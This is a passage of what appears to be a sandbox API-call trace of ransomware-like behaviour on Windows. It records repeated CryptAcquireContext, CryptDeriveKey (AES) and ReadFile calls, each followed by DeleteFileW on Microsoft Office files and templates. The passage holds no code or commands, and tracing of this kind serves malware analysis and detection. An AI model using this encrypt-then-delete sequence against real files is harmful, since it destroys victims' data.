CryptDestroyKey (hKey=0x284d668) returned 1 [0172.365] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0172.368] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.Runtime.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessapplications.runtime.xml")) returned 1 [0172.370] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0172.370] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0172.370] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.370] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d668) returned 1 [0172.370] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb2 [0172.370] ReadFile (in: hFile=0x4ac, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0172.373] CryptDestroyHash (hHash=0x284d528) returned 1 [0172.373] CryptDestroyKey (hKey=0x284d668) returned 1 [0172.373] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0172.375] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.RuntimeUi.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessapplications.runtimeui.xml")) returned 1 [0172.376] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0172.377] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0172.377] CryptHashData (hHash=0x284d5a8, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.377] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d668) returned 1 [0172.377] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x33737 [0172.377] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0172.398] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0172.398] CryptDestroyKey (hKey=0x284d668) returned 1 [0172.398] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0172.400] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessData.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessdata.xml")) returned 1 [0172.403] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0172.404] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0172.404] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.404] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d668) returned 1 [0172.404] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc5265 [0172.404] ReadFile (in: hFile=0x4ac, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0172.462] CryptDestroyHash (hHash=0x284d528) returned 1 [0172.462] CryptDestroyKey (hKey=0x284d668) returned 1 [0172.462] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0172.463] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.SemiTrust.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.interop.infopath.semitrust.xml")) returned 1 [0172.471] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0172.471] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0172.471] CryptHashData (hHash=0x284d5a8, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.471] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d668) returned 1 [0172.471] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x837d7 [0172.471] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0172.517] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0172.517] CryptDestroyKey (hKey=0x284d668) returned 1 [0172.517] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0172.519] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.Xml.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.interop.infopath.xml.xml")) returned 1 [0172.530] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0172.531] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0172.531] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.531] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d668) returned 1 [0172.531] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x311b0 [0172.531] ReadFile (in: hFile=0x4ac, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0172.555] CryptDestroyHash (hHash=0x284d528) returned 1 [0172.555] CryptDestroyKey (hKey=0x284d668) returned 1 [0172.555] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0172.557] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.sharepoint.businessdata.administration.client.xml")) returned 1 [0172.579] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.580] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0172.581] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0172.581] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.581] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0172.581] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1fa [0172.581] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0172.588] CryptDestroyHash (hHash=0x284d668) returned 1 [0172.588] CryptDestroyKey (hKey=0x284d528) returned 1 [0172.588] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0172.589] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNote-PipelineConfig.xml" (normalized: "c:\\program files\\microsoft office\\office14\\onenote\\sendtoonenote-pipelineconfig.xml")) returned 1 [0172.604] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.737] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.784] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.785] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.785] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.786] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.806] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.823] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.866] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.867] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.869] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0172.871] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0172.871] CryptHashData (hHash=0x284d5a8, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.871] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0172.871] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x67 [0172.871] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x67, lpOverlapped=0x0) returned 1 [0172.872] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0172.872] CryptDestroyKey (hKey=0x284d568) returned 1 [0172.872] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0172.873] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SketchPadTestSchema.xml" (normalized: "c:\\program files\\microsoft office\\office14\\sketchpadtestschema.xml")) returned 1 [0172.875] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0172.875] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0172.875] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.876] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0172.876] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x173e8 [0172.876] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0172.918] CryptDestroyHash (hHash=0x284d528) returned 1 [0172.918] CryptDestroyKey (hKey=0x284d568) returned 1 [0172.918] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0172.919] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SplashScreen.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\splashscreen.bmp")) returned 1 [0172.921] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.921] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.923] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.944] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.945] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0172.946] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0172.946] CryptHashData (hHash=0x284d5a8, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.946] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0172.946] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0172.946] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0172.947] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0172.947] CryptDestroyKey (hKey=0x284d568) returned 1 [0172.947] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0172.948] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\office14\\_help.txt")) returned 1 [0172.949] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.957] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.958] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.959] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.972] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.974] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.987] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.988] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.988] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0172.989] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0172.989] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.989] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0172.989] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x329e7 [0172.989] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0173.010] CryptDestroyHash (hHash=0x284d568) returned 1 [0173.010] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0173.010] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0173.011] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adjacencyletter.dotx")) returned 1 [0173.014] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0173.014] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0173.015] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.015] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0173.015] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x33b26 [0173.015] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0173.026] CryptDestroyHash (hHash=0x284d668) returned 1 [0173.026] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0173.026] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0173.028] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyMergeLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adjacencymergeletter.dotx")) returned 1 [0173.031] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0173.032] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0173.032] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.032] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0173.032] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x36f0b8 [0173.032] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0173.340] CryptDestroyHash (hHash=0x284d568) returned 1 [0173.340] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0173.340] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0173.341] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyReport.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adjacencyreport.dotx")) returned 1 [0173.346] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0173.346] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0173.346] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.346] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0173.346] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3bcb7 [0173.347] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0173.374] CryptDestroyHash (hHash=0x284d668) returned 1 [0173.374] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0173.374] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0173.376] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyResume.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adjacencyresume.dotx")) returned 1 [0173.378] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0173.379] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0173.379] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.379] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0173.379] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2941e [0173.379] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0173.403] CryptDestroyHash (hHash=0x284d568) returned 1 [0173.403] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0173.403] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0173.405] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ApothecaryLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\apothecaryletter.dotx")) returned 1 [0173.407] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0173.407] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0173.407] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.407] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0173.407] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2f0f2 [0173.407] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0173.433] CryptDestroyHash (hHash=0x284d668) returned 1 [0173.433] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0173.433] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0173.434] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ApothecaryMergeLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\apothecarymergeletter.dotx")) returned 1 [0173.437] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0173.437] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0173.437] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.437] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0173.437] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3462a [0173.437] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0173.467] CryptDestroyHash (hHash=0x284d568) returned 1 [0173.467] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0173.467] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0173.469] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ApothecaryNewsletter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\apothecarynewsletter.dotx")) returned 1 [0173.472] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0173.472] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0173.472] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.473] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0173.473] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x37879 [0173.473] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0173.513] CryptDestroyHash (hHash=0x284d668) returned 1 [0173.513] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0173.513] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0173.515] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ApothecaryResume.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\apothecaryresume.dotx")) returned 1 [0173.518] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0173.519] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0173.519] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.519] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0173.519] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x47c8 [0173.519] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0173.533] CryptDestroyHash (hHash=0x284d568) returned 1 [0173.533] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0173.534] 